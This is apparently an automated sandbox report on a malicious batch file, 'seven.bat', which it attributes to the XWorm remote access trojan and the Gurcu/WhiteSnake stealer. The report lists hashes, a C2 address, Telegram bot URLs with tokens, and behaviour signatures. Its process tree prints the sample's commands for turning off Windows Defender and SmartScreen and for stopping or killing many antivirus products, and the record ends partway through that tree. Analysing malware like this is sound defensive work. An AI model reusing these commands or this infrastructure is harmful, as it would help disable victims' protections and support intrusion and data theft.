Analysis

  • max time kernel
    179s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 13:56

General

  • Target

    seven.bat

  • Size

    13KB

  • MD5

    72b37c80ee58d00b5ffa174aabbb0b57

  • SHA1

    cf6c0f3bca62c83da4ee34c4929262bad1770ba1

  • SHA256

    a32aab9ec5b65cb24c9bec2cef92239ea0d27937123d2569b95530101e1c3459

  • SHA512

    63d5a1a2daa676b8079f0da3d062659e661a1228211cbdd5aec4e86713847ee66071c956c34a2b3c20a70613ee9a3275f4e6ae1b3fb958e31f1d0002c27b711e

  • SSDEEP

    384:c1ENmEhhmE77EIGujENmEhhmE77EIGD+G2dAI8b/mHT9YT3Q6TbsebaQD4Lforql:8Spb6jDGams

Malware Config

Extracted

Family

xworm

C2

89.23.100.91:7174

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    csrss.exe

  • telegram

    https://api.telegram.org/bot7044550017:AAG7R8kaIhFKV-CXgKS_6BPleXbgza38o8w

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6338125361:AAEpz2yMO25tDxVh4mOCZ2gjyEu5ZDJz6R4/sendMessag

Signatures

  • Detect Xworm Payload 2 IoCs
  • Disables service(s) 3 TTPs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Powershell Invoke Web Request.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 4 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 52 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 45 IoCs
  • Modifies data under HKEY_USERS 62 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:612
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1056
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Indicator Removal: Clear Windows Event Logs
                PID:1148
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1156
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2808
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1164
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1208
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1280
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1288
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1312
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1440
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1492
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                  • Modifies registry class
                                  PID:2732
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1528
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1540
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                    1⤵
                                      PID:1672
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1684
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1736
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1772
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1832
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1884
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1896
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1964
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1088
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:1008
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2116
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                            PID:2220
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2268
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2424
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2432
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2580
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2624
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2660
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2692
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2704
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2820
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3000
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3092
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3328
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3432
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\seven.bat"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4592
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      3⤵
                                                                                        PID:5908
                                                                                      • C:\Windows\system32\chcp.com
                                                                                        chcp 65001
                                                                                        3⤵
                                                                                          PID:6056
                                                                                        • C:\Windows\system32\net.exe
                                                                                          net session
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3016
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 session
                                                                                            4⤵
                                                                                              PID:1412
                                                                                          • C:\Windows\system32\PING.EXE
                                                                                            ping -n 2 127.0.0.1
                                                                                            3⤵
                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                            • Runs ping.exe
                                                                                            PID:3516
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -window hidden -command ""
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:536
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Add-MpPreference -ExclusionPath 'C:'"
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4980
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4884
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +h "Crack" /s /d
                                                                                            3⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:2136
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Crack'"
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3396
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                            3⤵
                                                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                                                            PID:1820
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                                                                            3⤵
                                                                                              PID:2932
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v AllowFastServiceStartup /t REG_DWORD /d 0 /f
                                                                                              3⤵
                                                                                                PID:3564
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:2016
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:5988
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:4184
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop WinDefend
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2804
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc config WinDefend start= disabled
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4164
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop WdNisSvc
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3776
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc config WdNisSvc start= disabled
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1696
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 4 /f
                                                                                                3⤵
                                                                                                • Modifies security service
                                                                                                PID:3772
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop wscsvc
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1384
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc config wscsvc start= disabled
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4476
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f
                                                                                                3⤵
                                                                                                  PID:3936
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f
                                                                                                  3⤵
                                                                                                    PID:2284
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avp.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:116
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avpui.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2564
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM klnagent.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4804
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop kavsvc
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:3044
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config kavsvc start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:3956
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM 360tray.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2856
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM 360sd.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5404
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM 360rp.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2460
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop 360BaseSvc
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2980
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config 360BaseSvc start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:904
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM egui.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:6076
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM ekrn.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5116
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop ekrn
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4320
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config ekrn start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2212
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM Mcshield.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1468
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM McTray.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2288
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM mfevtps.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5456
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop McAfeeFramework
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:3216
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config McAfeeFramework start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1176
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avgnt.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2176
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avguard.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5284
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avshadow.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5216
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop Avira.ServiceHost
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2836
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config Avira.ServiceHost start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:3472
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM dwengine.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2784
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM spideragent.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3420
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM drweb32.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5764
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM drwebsc.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1020
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop DrWebEngine
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1340
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config DrWebEngine start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5628
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop DrWebSpIDer
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4316
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config DrWebSpIDer start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:412
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM bdagent.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4156
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM bdservicehost.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3112
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM bdredline.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5096
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop BDProtect
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1732
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config BDProtect start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:1396
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avastsvc.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2960
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM aswToolsSvc.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4404
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM aswEngSrv.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5956
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop "avast! Antivirus"
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5568
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config "avast! Antivirus" start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5504
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avgwdsvc.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5492
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avgsvc.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6016
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM avgui.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5652
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop AVGService
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5708
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config AVGService start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:3660
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM nortonsecurity.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5488
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM ns.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2192
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM navw32.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4660
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop NortonSecurity
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4504
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config NortonSecurity start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:6040
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM tmproxy.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4656
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM pccntmon.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3620
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM tmlisten.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:344
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop TmProxy
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4600
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc config TmProxy start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2812
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM mbam.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2236
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM mbamservice.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
